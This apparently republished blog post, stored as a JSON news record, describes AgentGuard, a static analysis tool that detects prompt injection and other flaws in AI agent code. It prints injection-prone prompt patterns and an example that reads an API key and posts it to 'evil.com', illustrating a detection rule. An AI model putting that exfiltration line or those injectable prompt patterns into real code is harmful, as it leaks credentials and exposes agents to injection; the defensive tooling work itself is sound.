{"slug": "beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities", "title": "Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities", "summary": "AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.", "body_md": "When I started building [AgentGuard](https://github.com/dockfixlabs/agentguard), the first question was: how do you detect a prompt injection vulnerability in source code?\n\nUnlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of **untrusted data flowing into LLM context**. The vulnerability isn't in a function call -- it's in how data is constructed.\n\nEvery SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:\n\n```\n# ASI01: Prompt Injection\nFSTRING_INJECTION = re.compile(\n    r'(?:prompt|system|message|instruction)\\s*[:=]\\s*f[\"\\'].*\\{.*\\}',\n    re.I\n)\n```\n\nThis catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.\n\nRegex has limits. Consider:\n\n```\n# Pattern A: Obvious\nprompt = f\"You are a helper. {user_input}\"\n\n# Pattern B: Subtle\ntemplate = \"You are a helper. {input}\"\nprompt = template.format(input=user_data)\n\n# Pattern C: Hidden\nmessages = [{\"role\": \"system\", \"content\": config[\"system_prompt\"] + user_message}]\n```\n\nPattern A is trivial to detect. Pattern B requires understanding `.format()`\n\nsemantics. Pattern C requires tracking data flow through dictionaries and list construction.\n\nThis is where AgentGuard is headed next: **AST-based semantic analysis**.\n\nThe next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:\n\n`user_input`\n\n, `query`\n\n, `message`\n\n, `request.body`\n\n`openai.chat.completions.create`\n\n, `prompt`\n\n, `messages`\n\n, `system`\n\nThis is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.\n\nAgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):\n\n```\n# Line 1: Secret access\napi_key = os.environ.get(\"API_KEY\")\n\n# Line 2: Network call\nrequests.post(\"https://evil.com/collect\", headers={\"Auth\": api_key})\n```\n\nThe rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.\n\nFuture versions will extend this to full function-level taint tracking.\n\nAgentGuard currently covers all 10 categories:\n\n| ASI | Rule | Detection Method |\n|---|---|---|\n| ASI01 | Prompt Injection | Regex (f-string, concat, format) |\n| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |\n| ASI03 | Data Exfiltration | Regex + cross-line correlation |\n| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |\n| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |\n| ASI06 | Insecure Output | Regex (raw HTML, eval output) |\n| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |\n| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |\n| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |\n| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |\n\nThe [benchmark suite](https://github.com/dockfixlabs/agentguard-benchmark) has 28 samples:\n\nThe long-term goal is simple: **make AI agent code as auditable as web application code**. We have Semgrep for web apps. We need AgentGuard for agent apps.\n\n[AgentGuard](https://github.com/dockfixlabs/agentguard) is MIT-licensed and open source. Install with `pip install dfx-agentguard`\n\n.", "url": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities", "canonical_source": "https://dev.to/dockfixlabs/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities-hi3", "published_at": "2026-06-28 22:45:51+00:00", "updated_at": "2026-06-28 23:27:13.248149+00:00", "lang": "en", "topics": ["ai-safety", "ai-agents", "developer-tools", "large-language-models", "ai-research"], "entities": ["AgentGuard", "Dockfix Labs", "Semgrep", "CodeQL", "ASI01", "ASI03", "Python", "JavaScript"], "alternates": {"html": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities", "markdown": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities.md", "text": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities.txt", "jsonld": "https://wpnews.pro/news/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities.jsonld"}}